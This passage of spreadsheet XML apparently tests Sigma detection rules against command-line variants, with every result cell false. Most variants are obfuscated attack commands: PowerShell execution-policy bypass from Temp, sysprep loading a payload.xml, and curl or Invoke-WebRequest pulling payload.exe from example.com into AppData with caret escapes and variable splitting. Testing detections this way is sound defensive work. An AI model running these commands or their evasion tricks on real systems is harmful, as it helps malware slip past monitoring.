          <t>powershell.exe -EXECuTIoNpOLIcy Bypass /"File" C:\Windows\Temp\script.ps1 -COmmEnT " &gt; "</t>
        </is>
      </c>
      <c r="F263" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G263" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H263" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I263" s="43" t="n"/>
      <c r="J263" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K263" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="43" t="n"/>
      <c r="B264" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C264" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D264" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E264" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"File" C:\Windows\Temp\script.ps1 -COmmENT " &gt; "</t>
        </is>
      </c>
      <c r="F264" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G264" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H264" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I264" s="43" t="n"/>
      <c r="J264" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K264" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="43" t="n"/>
      <c r="B265" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C265" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D265" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E265" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:\Windows\Temp\script.ps1 -Comment " &gt; "</t>
        </is>
      </c>
      <c r="F265" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G265" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H265" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I265" s="43" t="n"/>
      <c r="J265" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K265" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="43" t="n"/>
      <c r="B266" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C266" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D266" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E266" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecUTiONpolicY Bypass -"File" C:\Windows\Temp\script.ps1 -Comment " &gt; "</t>
        </is>
      </c>
      <c r="F266" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G266" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H266" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266" s="43" t="n"/>
      <c r="J266" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K266" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="43" t="n"/>
      <c r="B267" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C267" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D267" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E267" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -fILE C:\Windows\Temp\script.ps1 -COmmEnt " &gt; "</t>
        </is>
      </c>
      <c r="F267" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G267" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H267" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I267" s="43" t="n"/>
      <c r="J267" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K267" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="43" t="n"/>
      <c r="B268" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysprep_appdata</t>
        </is>
      </c>
      <c r="C268" s="44" t="inlineStr">
        <is>
          <t>Sysprep on AppData Folder</t>
        </is>
      </c>
      <c r="D268" s="44" t="inlineStr">
        <is>
          <t>d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e</t>
        </is>
      </c>
      <c r="E268" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Default\AppData\Local\Temp &amp;&amp; C:\Windows\System32\sysprep\sysprep.exe /unattend:payload.xml"</t>
        </is>
      </c>
      <c r="F268" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G268" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H268" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K268" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="43" t="n"/>
      <c r="B269" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysprep_appdata</t>
        </is>
      </c>
      <c r="C269" s="44" t="inlineStr">
        <is>
          <t>Sysprep on AppData Folder</t>
        </is>
      </c>
      <c r="D269" s="44" t="inlineStr">
        <is>
          <t>d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e</t>
        </is>
      </c>
      <c r="E269" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "cd C:\Users\Default\AppData\Local\Temp &amp;&amp; C:\Windows\System32\sysprep\sysprep.exe /unattend:payload.xml"</t>
        </is>
      </c>
      <c r="F269" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G269" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H269" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269" s="43" t="n"/>
      <c r="J269" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K269" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="43" t="n"/>
      <c r="B270" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C270" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D270" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E270" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-N' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I270" s="43" t="n"/>
      <c r="J270" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K270" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="43" t="n"/>
      <c r="B271" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C271" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D271" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E271" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I271" s="43" t="n"/>
      <c r="J271" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K271" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="44" t="n"/>
      <c r="B272" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C272" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D272" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E272" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F272" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G272" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H272" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272" s="43" t="n"/>
      <c r="J272" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K272" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B273" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C273" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D273" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E273" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F273" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G273" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H273" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I273" s="43" t="n"/>
      <c r="J273" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K273" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B274" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C274" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D274" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E274" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I274" s="43" t="n"/>
      <c r="J274" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K274" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B275" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C275" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D275" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E275" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275" s="44" t="n"/>
      <c r="J275" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K275" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B276" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C276" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D276" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E276" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276" s="43" t="n"/>
      <c r="J276" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K276" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B277" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C277" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D277" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E277" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I277" s="44" t="n"/>
      <c r="J277" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K277" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B278" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C278" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D278" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E278" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278" s="43" t="n"/>
      <c r="J278" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K278" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B279" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C279" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D279" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E279" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I279" s="43" t="n"/>
      <c r="J279" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K279" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B280" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C280" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D280" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E280" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="43" t="n"/>
      <c r="J280" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K280" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B281" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C281" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D281" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E281" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="43" t="n"/>
      <c r="J281" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K281" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B282" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C282" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D282" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E282" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="43" t="n"/>
      <c r="J282" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K282" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B283" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C283" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D283" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E283" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I283" s="43" t="n"/>
      <c r="J283" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K283" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B284" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C284" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D284" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E284" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F284" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G284" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H284" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284" s="43" t="n"/>
      <c r="J284" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K284" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B285" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C285" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D285" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E285" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I285" s="43" t="n"/>
      <c r="J285" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K285" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B286" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C286" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D286" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E286" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \"$env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I286" s="43" t="n"/>
      <c r="J286" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K286" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B287" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C287" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D287" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E287" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I287" s="43" t="n"/>
      <c r="J287" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K287" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B288" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C288" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D288" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E288" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288" s="44" t="n"/>
      <c r="J288" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K288" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B289" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C289" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D289" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E289" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F289" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G289" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H289" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289" s="44" t="n"/>
      <c r="J289" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K289" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B290" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C290" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D290" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E290" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="44" t="n"/>
      <c r="J290" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K290" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B291" s="44" t="inlineStr">
        <is>
